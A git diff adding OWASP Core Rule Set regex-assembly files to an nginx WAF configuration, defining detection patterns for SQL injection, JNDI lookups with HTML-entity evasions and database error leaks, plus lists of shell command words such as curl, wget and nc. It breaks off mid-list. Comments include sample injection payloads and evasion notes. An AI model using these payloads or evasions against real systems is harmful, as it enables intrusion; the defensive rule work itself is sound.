+##! this rule tries to match the following payloads:
+##!
+##! PostgreSQL: '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb
+##! PostgreSQL: '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb
+##! PostgreSQL: '{"b":2}'::jsonb @ '{"a":1, "b":2}'::jsonb
+##! PostgreSQL: '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb
+##! PostgreSQL: '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb
+##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7
+##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7
+##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' < '$.c[2].f' = 7
+##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' > '$.c[2].f' = 7
+##! MySQL: JSON_EXTRACT('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan'
+
+##!> define quotes [\"'`]
+##!> define operators (?:@>|<@|\?|\?\||\?&|#>|#>>|->>|<|>|->|<-)
+##!> define json_ending_brackets [\]\}]
+##!> define json_starting_brackets [\[\{]
+
+##!> assemble
+ ##! https://regex101.com/r/mzG5Fg/1
+ {{quotes}}{{json_starting_brackets}}.*{{json_ending_brackets}}{{quotes}}.*(::.*jsonb?)?.*{{operators}}
+ {{operators}}{{quotes}}{{json_starting_brackets}}.*{{json_ending_brackets}}{{quotes}}
+
+ ##! example: SELECT id FROM users WHERE id=JsoN_EXTraCT/**/(/**/' {"a":1} '/**/,/**/' $.a '/**/);
+ json_extract.*\(.*\)
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/942560.ra b/nginx/config/owasp-crs/regex-assembly/942560.ra
new file mode 100644
index 00000000..cb40cfa9
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942560.ra
@@ -0,0 +1,8 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+1\.e,
+1\.e\(
+1\.e\)
diff --git a/nginx/config/owasp-crs/regex-assembly/944150.ra b/nginx/config/owasp-crs/regex-assembly/944150.ra
new file mode 100644
index 00000000..523aebf5
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/944150.ra
@@ -0,0 +1,23 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! The following is an expansion of
+##! (?:\${[^}]{0,15}\${|\${(?:jndi|ctx))
+##! where every character also matches the equivalent named HTML entity.
+##! It is a workaround for the shortcomings of `htmlEntityDecode`, which
+##! handles numerical HTML entities well but only handles 5 named
+##! entities. The official list of named entities can be found here:
+##! https://html.spec.whatwg.org/multipage/named-characters.html.
+##!
+##! Note:
+##! - We don't match `}` or `}` because it would enable more
+##! evasions while also increasing the number of potential false positives.
+##! The risk of false negatives in this case is acceptable.
+##! - Omitting the terminating semi-colon can be used as an evasion with lenient
+##! parsers. We catch those by making the semi-colon optional.
+
+
+##!+ i
+
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)[^}]{0,15}(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)(?:jndi|ctx)
diff --git a/nginx/config/owasp-crs/regex-assembly/944151.ra b/nginx/config/owasp-crs/regex-assembly/944151.ra
new file mode 100644
index 00000000..a8174bac
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/944151.ra
@@ -0,0 +1,22 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! The following is an expansion of
+##! (?:\$\{[^}]*\$\{|\$\{(?:jndi|ctx))
+##! where every character also matches the equivalent named HTML entity.
+##! It is a workaround for the shortcomings of `htmlEntityDecode`, which
+##! handles numerical HTML entities well but only handles 5 named
+##! entities. The official list of named entities can be found here:
+##! https://html.spec.whatwg.org/multipage/named-characters.html.
+##!
+##! Note:
+##! - We don't match `}` or `}` because it would enable more
+##! evasions while also increasing the number of potential false positives.
+##! The risk of false negatives in this case is acceptable.
+##! - Omitting the terminating semi-colon can be used as an evasion with lenient
+##! parsers. We catch those by making the semi-colon optional.
+
+##!+ i
+
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)[^}]*(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)(?:jndi|ctx)
diff --git a/nginx/config/owasp-crs/regex-assembly/944152.ra b/nginx/config/owasp-crs/regex-assembly/944152.ra
new file mode 100644
index 00000000..158445de
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/944152.ra
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! The following is an expansion of
+##! (?:\${[^}]{0,15}\${|\${(?:jndi|ctx))
+##! where every character also matches the equivalent named HTML entity.
+##! It is a workaround for the shortcomings of `htmlEntityDecode`, which
+##! handles numerical HTML entities well but only handles 5 named
+##! entities. The official list of named entities can be found here:
+##! https://html.spec.whatwg.org/multipage/named-characters.html.
+##!
+##! - Omitting the terminating semi-colon can be used as an evasion with lenient
+##! parsers. We catch those by making the semi-colon optional.
+
+
+##!+ i
+
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)
diff --git a/nginx/config/owasp-crs/regex-assembly/951230.ra b/nginx/config/owasp-crs/regex-assembly/951230.ra
new file mode 100644
index 00000000..a96b6f9c
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/951230.ra
@@ -0,0 +1,22 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+supplied argument is not a valid MySQL
+Column count doesn't match value count at row
+mysql_fetch_array\(\)
+on MySQL result index
+You have an error in your SQL syntax;
+You have an error in your SQL syntax near
+MySQL server version for the right syntax to use
+\[MySQL\]\[ODBC
+Column count doesn't match
+Table '[^']+' doesn't exist
+SQL syntax.*MySQL
+##! Because of the bug in RE2 (golang), we cannot use {0,n} (a range started at 0), so it was replaced with (?:...{1,n})?
+Warning.{1,10}mysql_(?:[a-z_()]{1,26})?
+valid MySQL result
+MySqlClient\.
+ERROR [0-9]{4} \([a-z0-9]{5}\):
+XPATH syntax error:
diff --git a/nginx/config/owasp-crs/regex-assembly/951240.ra b/nginx/config/owasp-crs/regex-assembly/951240.ra
new file mode 100644
index 00000000..7be6aa13
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/951240.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+PostgreSQL query failed:
+pg_query\(\) \[:
+pg_exec\(\) \[:
+PostgreSQL.{1,20}ERROR
+##! Example match: Warning: pg_fetch_array(): 3 is not a valid PostgreSQL result resource
+Warning.{1,20}\bpg_.*
+valid PostgreSQL result
+Npgsql\.
+PG::[a-z]*Error
+Supplied argument is not a valid PostgreSQL .*? resource
+Unable to connect to PostgreSQL server
+invalid input syntax for integer
diff --git a/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl1.ra b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl1.ra
new file mode 100644
index 00000000..a38db686
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl1.ra
@@ -0,0 +1,820 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! - unix-shell-upto3.ra and +##! - unix-shell-4andup.ra + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `awk@` to `awk~`, this list would not have to be updated. + +##! To automatically add exclusions for English words from the sources, run the following: +##! NL=$'\n' +##! original="$(grep -vE '^[#$]' regex-assembly/exclude/unix-shell-fps-pl1.ra)" +##! upto3="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! rest="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" +##! english_upto3="$(util/fp-finder/spell.sh -m -e regex-assembly/include/unix-shell-upto3.ra)" +##! # strip suffixes from words so that spell.sh works +##! english_rest="$(util/fp-finder/spell.sh -m -e -s '[@~]' regex-assembly/include/unix-shell-4andup.ra)" +##! result="" +##! function update_existing { +##! if [ -z "${1}" ]; then +##! return +##! fi +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if grep -qE "^${eword}[@~]?" <<<"${oword}"; then +##! result="${result}${eword}${NL}" +##! result="${result}${eword}@${NL}" +##! result="${result}${eword}~${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${1}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" +##! } +##! function add_new { +##! if [ -z "${1}" ]; then +##! return +##! fi +##! while read -r eword; do +##! if ! grep -qE "^${eword}[@~]?" <<<"${original}"; then +##! result="${result}${eword}${NL}" +##! result="${result}${eword}@${NL}" +##! result="${result}${eword}~${NL}" +##! fi +##! done <<<"${1}" +##! } +##! update_existing "${english_upto3}" +##! update_existing "${english_rest}" +##! 
add_new "${english_upto3}" +##! add_new "${english_rest}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/exclude/unix-shell-fps-pl1.ra | cut -d: -f1) +##! ed -s regex-assembly/exclude/unix-shell-fps-pl1.ra <> regex-assembly/exclude/unix-shell-fps-pl1.ra + +GET +GET@ +GET~ +HEAD +HEAD@ +HEAD~ +POST +POST@ +POST~ +ab +ab@ +ab~ +adduser +agetty +alias +alias@ +alias~ +alpine +alpine@ +alpine~ +ansible-playbook +apt +apt-get +apt@ +aptitude +aptitude@ +aptitude~ +apt~ +ar +ar@ +arch +arch@ +arch~ +aria2c +arj +arp +arp@ +arp~ +ar~ +as +as@ +ascii-xfr +ascii85 +ash +ash@ +ash~ +aspell +as~ +at +at@ +atobm +at~ +awk +awk@ +aws +aws@ +basename +basename@ +basename~ +bash +bash@ +bash~ +batch +batch@ +batch~ +bpftrace +breaksw +bridge +bridge@ +bridge~ +bundler@ +busctl +byebug +c89 +c99 +cancel +cancel@ +cancel~ +capsh@ +cat +cat@ +cat~ +cc +cc@ +cc~ +certbot +chattr +chdir@ +check_by_ssh +check_cups +check_log +check_memory +check_raid +check_ssl_cert +check_statusfile +chflags +chmod +choom +chown +chroot +chroot@ +chroot~ +clang +clang@ +clang~ +cmp +cobc +column +column@ +column~ +comm +command +command@ +command~ +composer +composer@ +composer~ +compress +compress@ +compress~ +cowsay +cowthink +cp +cp@ +cpan +cpio +cpulimit +crash +crash@ +crash~ +crontab +csplit +csvtool +cupsfilter +curl +curl@ +curl~ +cut +cut@ +cut~ +dash +dash@ +dash~ +date +date@ +date~ +dd +dd@ +dd~ +dhclient +dialog +dialog@ +dialog~ +dig +dig@ +dig~ +dir +dir@ +dir~ +dmidecode +dmsetup +dnf +docker +docker@ +docker~ +done +done@ +done~ +dosbox +dpkg +du +du@ +dvips +easy_install +eb +eb@ +eb~ +echo +echo@ +echo~ +ed +ed@ +ed~ +efax +emacs +endif +endsw +env-update +eqn +es +es@ +esac +es~ +eval +eval@ +eval~ +ex +ex@ +exec +exec@ +exec~ +exiftool +expand +expand@ +expand~ +expect +expect@ +expect~ +export +export@ +export~ +expr +ex~ +facter +fc +fc@ +fetch +fetch@ +fetch~ +fi +fi@ +file +file@ +file~ +find +find@ +find~ +finger +finger@ +finger~ +fish +fish@ +fish~ +fi~ +flock 
+flock@ +flock~ +fmt +fold +fold@ +fold~ +foreach +fping +ftp +ftp@ +ftp~ +function +function@ +function~ +gawk +gawk@ +gawk~ +gcore +gdb +gem +gem@ +gem~ +genie +genie@ +genie~ +genisoimage +getfacl@ +ghc +ghci +gimp +gimp@ +gimp~ +ginsh +git +git@ +git~ +go +go@ +go~ +grc +group +group@ +group~ +gtester +hash +hash@ +hash~ +hd +hd@ +head +head@ +head~ +hexdump +highlight +highlight@ +highlight~ +history +history@ +history~ +hostid +hostname +hping3 +htdigest +htpasswd +iconv +id +id@ +id~ +ifconfig +iftop +install +install@ +install~ +ionice +ip +ip6tables +ip@ +ipconfig +iptables +ip~ +ispell +java +java@ +java~ +jexec +jjs +jobs +jobs@ +jobs~ +join +join@ +join~ +journalctl +jq +jrunscript +kill +kill@ +killall +kill~ +knife +knife@ +knife~ +ksshell +last +last@ +last~ +latex +latex@ +latex~ +ld +ld@ +ldconfig +ldd +ldd@ +less +less@ +less~ +links +links@ +links~ +ln +ln@ +local +local@ +local~ +locate +locate@ +locate~ +loginctl +logname +logsave +look +look@ +look~ +lp +lp@ +lp~ +lshw +ltrace +lua +lua@ +lualatex +luatex +lwp-dump +lwp-mirror +lwp-request +lynx +lynx@ +lynx~ +mail +mail@ +mailx@ +mail~ +make +make@ +make~ +man +man@ +man~ +mawk +mkdir@ +more +more@ +more~ +mosquitto +mount +mount@ +mount~ +msgattrib +msgcat +msgconv +msgfilter +msgmerge +msguniq +mtr +mutt +mutt@ +mutt~ +mv +mv@ +mv~ +mysql +nano@ +nasm +nawk +nc +nc@ +nc~ +neofetch +net +net@ +net~ +nice +nice@ +nice~ +nl +nl@ +nm +nm@ +nmap +nm~ +node +node@ +node~ +npm +npm@ +nroff +nsenter +nslookup +null +null@ +null~ +octave +octave@ +octave~ +od +od@ +od~ +openssl +openvpn +openvt +opkg +pacman@ +parted +parted@ +parted~ +passwd +paste +paste@ +paste~ +patch +patch@ +patch~ +pax +pax@ +pax~ +pdb +pdflatex +pdftex +perf +perlsh +perms +perms@ +perms~ +pf +pf@ +pg +pic +pic@ +pico@ +pic~ +pidstat +ping +ping@ +ping~ +pip +pip@ +pip~ +pkg +pkg_info +pkginfo +pr +pr@ +pry +pry@ +pry~ +pr~ +ps +ps@ +psftp +psql +ps~ +ptx +puppet +puppet@ +puppet~ +pushd +python +python@ +python~ +rake 
+rake@ +rake~ +raku +rar +rar@ +readelf +red +red@ +redcarpet@ +red~ +rename +rename@ +rename~ +repeat +repeat@ +repeat~ +replace +replace@ +replace~ +restic +rev +rev@ +rev~ +rlogin +rlwrap +rm +rm@ +route +route@ +route~ +rpm +rpm@ +rpmdb +rpmquery +rpmverify +rpm~ +ruby +ruby@ +ruby~ +run-mailcap +run-parts +rview +rvim +sash +sash@ +sash~ +sched +sched@ +sched~ +screen +screen@ +screen~ +script +script@ +script~ +self +self@ +self~ +service +service@ +service~ +set +set@ +setarch +setfacl@ +set~ +sg +sg@ +sg~ +shadow +shadow@ +shadow~ +shells +shells@ +shells~ +shuf +shutdown +shutdown@ +shutdown~ +sleep +sleep@ +sleep~ +slsh +smbclient +snap +snap@ +snap~ +soelim +sort +sort@ +sort~ +source +source@ +source~ +split +split@ +split~ +sqlite3 +ss +ss@ +ssh-keygen +ssh-keyscan +sshpass +ss~ +start-stop-daemon +stdbuf +strace +strings +strings@ +strings~ +su +su@ +systemctl +systemd-resolve +tac +tail +tail@ +tail~ +tar +tar@ +tar~ +task +task@ +taskset +task~ +tbl +tclsh +tcp +tcp@ +tcpdump +tcp~ +tee +tee@ +tee~ +tex +tex@ +tex~ +tftp +tic +tic@ +tic~ +time +time@ +timedatectl +time~ +tmux +top +top@ +top~ +touch +touch@ +touch~ +troff +tshark +ul +ul@ +ulimit@ +uncompress +uncompress@ +uncompress~ +unexpand +uniq +unlink +unlink@ +unlink~ +unset +unset@ +unset~ +unshare@ +unzip +unzip@ +unzip~ +up2date@ +update-alternatives +uudecode +uuencode +valgrind +vi +vi@ +view +view@ +view~ +vim +vim@ +vimdiff +vim~ +virsh +vi~ +volatility +volatility@ +volatility~ +w +w@ +wall +wall@ +wall~ +watch +watch@ +watch~ +wc +whiptail +whiptail@ +whiptail~ +who +who@ +whois +who~ +wireshark +wish +wish@ +wish~ +w~ +xelatex +xetex +xmodmap +xmore +xpad +xterm +xxd +yarn +yarn@ +yarn~ +yelp +yelp@ +yelp~ +yes +yes@ +yes~ +yum +zathura +zero +zero@ +zero~ +zip +zip@ +zip~ +zsoelim +zypper 
diff --git a/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl2.ra b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl2.ra
new file mode 100644
index 00000000..50d80c74
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl2.ra
@@ -0,0 +1,37 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list excludes command words that are prone to cause false
+##! positives from the following include files:
+##! - unix-shell-upto3.ra
+##! - unix-shell-4andup.ra
+
+##! To reduce complexity, this file simply lists all possible
+##! variants of a word, so when a word would be changed from, e.g.,
+##! `awk@` to `awk~`, this list would not have to be updated.
+##! See also unix-shell-fps-pl1.ra.
+
+aptitude
+aptitude@
+aptitude~
+dnf
+dnf@
+dnf~
+pacman
+pacman@
+pacman~
+ps
+ps@
+ps~
+up2date
+up2date@
+up2date~
+vi
+vi@
+vi~
+who
+who@
+who~
+w
+w@
+w~
diff --git a/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-useragents.ra b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-useragents.ra
new file mode 100644
index 00000000..9cbd3f55
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-useragents.ra
@@ -0,0 +1,47 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list excludes command words that are prone to cause false
+##! positives from the following include files:
+##!
+##! - unix-shell-upto3.ra
+##! - unix-shell-4andup.ra
+##! - unix-shell-pl3.ra
+
+##! This list is managed manually and contains known user-agents causing false positives
+##! in rules checking for RCE in User-Agent and Referer request header.
+
+##! To reduce complexity, this file simply lists all possible
+##! variants of a word, so when a word would be changed from, e.g.,
+##! `curl@` to `curl~`, this list would not have to be updated.
+##! See also unix-shell-fps-pl1.ra.
+
+# CPanel client (https://cpanel.net): Cpanel-HTTP-Client/1.0
+cpan
+cpan@
+cpan~
+# curl (https://curl.se): curl/8.1.2
+curl
+curl@
+curl~
+# Links browser (https://en.wikipedia.org/wiki/Links_(web_browser)): Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)
+links
+links@
+links~
+# Requests (https://docs.python-requests.org/en/latest/index.html): python-requests/2.31.0
+# urllib (https://docs.python.org/3/library/urllib.html): Python-urllib/3.9
+python
+python@
+python~
+# Snapchat URL Preview Service (https://developers.snap.com/robots): Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots
+snap
+snap@
+snap~
+# w3m browser (https://en.wikipedia.org/wiki/W3m): w3m/0.5.1
+w3m
+w3m@
+w3m~
+# wget (https://www.gnu.org/software/wget/): wget
+wget
+wget@
+wget~
diff --git a/nginx/config/owasp-crs/regex-assembly/exclude/windows-commands-fps.ra b/nginx/config/owasp-crs/regex-assembly/exclude/windows-commands-fps.ra
new file mode 100644
index 00000000..a1d77375
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/exclude/windows-commands-fps.ra
@@ -0,0 +1,89 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list excludes command words that are prone to cause false
+##! because they're common English words.
+##!
+##! This list can be generated with:
+##! util/fp-finder/spell.sh -m regex-assembly/include/windows-commands.ra
+
+active
+add
+append
+arp
+assign
+at
+attributes
+break
+call
+cd
+change
+choice
+cipher
+clean
+clip
+cls
+color
+comp
+compact
+convert
+copy
+create
+date
+delete
+detail
+echo
+edit
+erase
+exec
+exit
+expand
+expose
+extend
+extract
+find
+finger
+fondue
+format
+ftp
+help
+inactive
+label
+list
+md
+mode
+more
+mount
+move
+msg
+online
+path
+pause
+ping
+print
+prompt
+query
+recover
+rem
+remove
+rename
+repair
+replace
+reset
+retain
+revert
+select
+shadow
+shift
+shrink
+shutdown
+sort
+start
+time
+title
+tree
+type
+ver
+verifier
+verify
+writer
diff --git a/nginx/config/owasp-crs/regex-assembly/include/allowed-charsets.ra b/nginx/config/owasp-crs/regex-assembly/include/allowed-charsets.ra
new file mode 100644
index 00000000..bf902f0f
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/allowed-charsets.ra
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list is in sync with the default value of tx.allowed_request_content_type_charset.
+
+iso-8859-1
+iso-8859-15
+utf-8
+windows-1252
diff --git a/nginx/config/owasp-crs/regex-assembly/include/charset-specification-no-anchors.ra b/nginx/config/owasp-crs/regex-assembly/include/charset-specification-no-anchors.ra
new file mode 100644
index 00000000..2cad0b73
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/charset-specification-no-anchors.ra
@@ -0,0 +1,112 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! The expression generated from this file matches a full HTTP
+##! `Accept` header by following the specification as far as
+##! necessary, while restricting the `charset` parameter
+##! to a list of explicitly allowed values.
+##! Where possible, the expression matches tokens "loosely",
+##! to reduce complexity and the risk of false positives.
+
+##! As this specification is used by several rules, we now
+##! store it as an include file.
+
+##! Specifications:
+##! https://httpwg.org/specs/rfc7231.html#request.conneg
+##! https://httpwg.org/specs/rfc7230.html
+
+##! Helpers
+##!> define non-token-without-dquote-chars (),/:;<=>?![\x5c\]{}
+
+##!> define non-token-chars \"{{non-token-without-dquote-chars}}
+
+##!> define token-chars [^{{non-token-chars}}]
+
+##!> define token-with-dquote-chars [^{{non-token-without-dquote-chars}}]
+
+##!> define type-subtype (?:\*|{{token-chars}}+)
+
+##! The specification does not allow `*` in place of `*/*` but
+##! enough clients use `*` for it to be an issue. Thus, it is
+##! explicitly allowed here.
+##!> define media-type (?:(?:{{type-subtype}}/{{type-subtype}})|\*)
+
+##! list of allowed charsets
+##!> assemble
+ (?:"?
+ ##!=>
+ ##!> include allowed-charsets
+ ##!=>
+ \b"?))
+ ##!=< allowed-charsets
+##!<
+
+
+##! Main assembly
+##!> assemble
+ (?:{{media-type}})
+ ##!=>
+ (?:\s*;\s*
+ ##!=>
+ (?:(?:charset\s*=\s*
+ ##!=>
+ ##!=> allowed-charsets
+
+ ##! If the first part wasn't a "charset", then
+ ##! anything is allowed here that is not "charset".
+ ##! Note that this doesn't follow the RFC strictly.
+ |(?:
+ ##!=>
+ ##! Do not match space, otherwise the following would be possible:
+ ##! "text/html; charset=invalid"
+ ##! 
`charset` would be matched by `{{token-chars}}`
+ [^c\s{{non-token-chars}}]{{token-chars}}*
+ c[^h{{non-token-chars}}]{{token-chars}}*
+ ch[^a{{non-token-chars}}]{{token-chars}}*
+ cha[^r{{non-token-chars}}]{{token-chars}}*
+ char[^s{{non-token-chars}}]{{token-chars}}*
+ chars[^e{{non-token-chars}}]{{token-chars}}*
+ charse[^t{{non-token-chars}}]{{token-chars}}*
+ ##!=>
+ )\s*=\s*{{token-with-dquote-chars}}+)
+ ##!=>
+ ##! Clients like to violate the RFC, be lenient with
+ ##! terminating semi-colons.
+ ;?
+ ##!=>
+ )*
+ ##!=>
+
+ ##! Multiple "media-range" expressions can be
+ ##! specified, comma separated.
+ (?:\s*,\s*
+ ##!=>
+ (?:{{media-type}})
+ ##!=>
+ (?:\s*;\s*
+ ##!=>
+ (?:(?:charset\s*=\s*
+ ##!=>
+ ##!=> allowed-charsets
+ |(?:
+ ##!=>
+ ##! Do not match space, otherwise the following would be possible:
+ ##! "text/html; charset=invalid"
+ ##! `charset` would be matched by `{{token-chars}}`
+ [^c\s{{non-token-chars}}]{{token-chars}}*
+ c[^h{{non-token-chars}}]{{token-chars}}*
+ ch[^a{{non-token-chars}}]{{token-chars}}*
+ cha[^r{{non-token-chars}}]{{token-chars}}*
+ char[^s{{non-token-chars}}]{{token-chars}}*
+ chars[^e{{non-token-chars}}]{{token-chars}}*
+ charse[^t{{non-token-chars}}]{{token-chars}}*
+ ##!=>
+ )\s*=\s*{{token-with-dquote-chars}}+)
+ ##!=>
+ ##! Clients like to violate the RFC, be lenient with
+ ##! terminating semi-colons.
+ ;?
+ ##!=>
+ )*)*
+ ##!=>
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/include/charset-specification.ra b/nginx/config/owasp-crs/regex-assembly/include/charset-specification.ra
new file mode 100644
index 00000000..24f2127d
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/charset-specification.ra
@@ -0,0 +1,21 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! The expression generated from this file matches a full HTTP
+##! `Accept` header by following the specification as far as
+##! necessary, while restricting the `charset` parameter
+##! to a list of explicitly allowed values.
+##! Where possible, the expression matches tokens "loosely",
+##! to reduce complexity and the risk of false positives.
+
+##! As this specification is used by several rules, we now
+##! store it as an include file.
+
+##! Specifications:
+##! https://httpwg.org/specs/rfc7231.html#request.conneg
+##! https://httpwg.org/specs/rfc7230.html
+
+##!^ ^
+##!$ $
+
+##!> include charset-specification-no-anchors
diff --git a/nginx/config/owasp-crs/regex-assembly/include/js-truthy-values.ra b/nginx/config/owasp-crs/regex-assembly/include/js-truthy-values.ra
new file mode 100644
index 00000000..5e229bb9
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/js-truthy-values.ra
@@ -0,0 +1,49 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Falsy and negations
+##!> assemble
+ !+
+ ##!=>
+ false
+ null
+ undefined
+ NaN
+ [-+]?0
+ "{2}
+ '{2}
+ `{2}
+##!<
+
+##! Truthy and double negations (word boundary)
+##!> assemble
+ (?:!!)*
+ ##!=>
+ true
+ [-+]?Infinity
+ [-+]?[1-9]\d*
+ new [a-zA-Z]\w*
+ this
+ window
+ String
+ Boolean
+ Object
+ Array
+ Function
+ ##!=>
+ \b
+ ##!=>
+##!<
+
+
+##! Truthy and double negations (no word boundary: anything that ends
+##! with a special character)
+##!> assemble
+ (?:!!)*
+ ##!=>
+ \{.*\}
+ \[.*\]
+ "[^"]+"
+ '[^']+'
+ `[^`]+`
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/include/sql-injection-function-names.ra b/nginx/config/owasp-crs/regex-assembly/include/sql-injection-function-names.ra
new file mode 100644
index 00000000..91b47bf8
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/sql-injection-function-names.ra 
@@ -0,0 +1,285 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ \b
+##!$ \W*\(
+
+adddate
+addtime
+aes_decrypt
+aes_encrypt
+ascii
+asciistr
+asin
+atan
+atan2
+benchmark
+bin_to_num
+bit_and
+bit_count
+bit_length
+bit_or
+bit_xor
+char_length
+character_length
+ciel
+cieling
+coalesce
+coercibility
+collation
+compress
+concat
+concat_ws
+connection_id
+conv
+convert
+convert_tz
+cos
+cot
+cr32
+curdate
+current_date
+current_setting
+current_time
+current_timestamp
+current_user
+curtime
+database
+database_to_xml
+date_add
+date_format
+date_sub
+datediff
+dayname
+dayofmonth
+dayofweek
+dayofyear
+dcount
+decode
+degrees
+des_decrypt
+des_encrypt
+dump
+elt
+encode
+encrypt
+endswith
+ends_with
+exp
+export_set
+extract
+extractvalue
+field_in_set
+find_in_set
+found_rows
+from_base64
+from_days
+from_unixtime
+geometrycollection
+get_format
+get_lock
+getpgusername
+greatest
+group_concat
+gtid_subset
+hex
+hextoraw
+ifnull
+inet6_aton
+inet6_ntoa
+inet_aton
+inet_ntoa
+insert
+instr
+interval
+is_free_lock
+is_ipv4
+is_ipv4_compat
+is_ipv4_mapped
+is_ipv6
+is_not
+is_not_null
+is_null
+is_superuser
+is_used_lock
+isnull
+json
+json_agg
+json_array
+json_array_elements
+json_array_elements_text
+json_array_length
+json_build_array
+json_build_object
+json_each
+json_each_text
+json_extract_path
+json_extract_path_text
+json_object
+json_object_agg
+json_object_keys
+json_populate_record
+json_populate_recordset
+json_strip_nulls
+json_to_record
+json_to_recordset
+json_typeof
+jsonb
+jsonb_array
+jsonb_array_elements
+jsonb_array_elements_text
+jsonb_array_length
+jsonb_build_array
+jsonb_build_object
+jsonb_object
+jsonb_each
+jsonb_each_text
+jsonb_extract_path
+jsonb_extract_path_text
+jsonb_insert
+jsonb_object
+jsonb_object_agg
+jsonb_object_keys
+jsonb_path_exists
+jsonb_path_exists_tz
+jsonb_path_match
+jsonb_path_match_tz
+jsonb_path_query
+jsonb_path_query_array
+jsonb_path_query_array_tz
+jsonb_path_query_first
+jsonb_path_query_first_tz
+jsonb_path_query_tz
+jsonb_populate_record
+jsonb_populate_recordset
+jsonb_pretty
+jsonb_set
+jsonb_set_lax
+jsonb_strip_nulls
+jsonb_to_record
+jsonb_to_recordset
+jsonb_typeof
+jsonpath
+last_day
+last_inser_id
+lcase
+least
+left
+likelihood
+likely
+linestring
+lo_from_bytea
+lo_put
+load_file
+localtimestamp
+locate
+log10
+log2
+lower
+lpad
+ltrim
+make_set
+makedate
+master_pos_wait
+md5
+microsecond
+mid
+monthname
+multilinestring
+multipoint
+multipolygon
+name_const
+not_in
+nullif
+oct
+octet_length
+old_password
+ord
+period_add
+period_diff
+pg_client_encoding
+pg_database
+pg_largeobject
+pg_ls_dir
+pg_read_file
+pg_sleep
+pg_user
+polygon
+position
+pow
+procedure_analyse
+quarter
+query_to_xml
+quote
+radians
+rand
+rawtohex
+release_lock
+row_count
+row_to_json
+rpad
+rtrim
+schema
+sec_to_time
+session_user
+sha
+sha1
+sha2
+sin
+soundex
+space
+sqlite_compileoption_get
+sqlite_compileoption_used
+sqlite_source_id
+sqrt
+startswith
+starts_with
+std
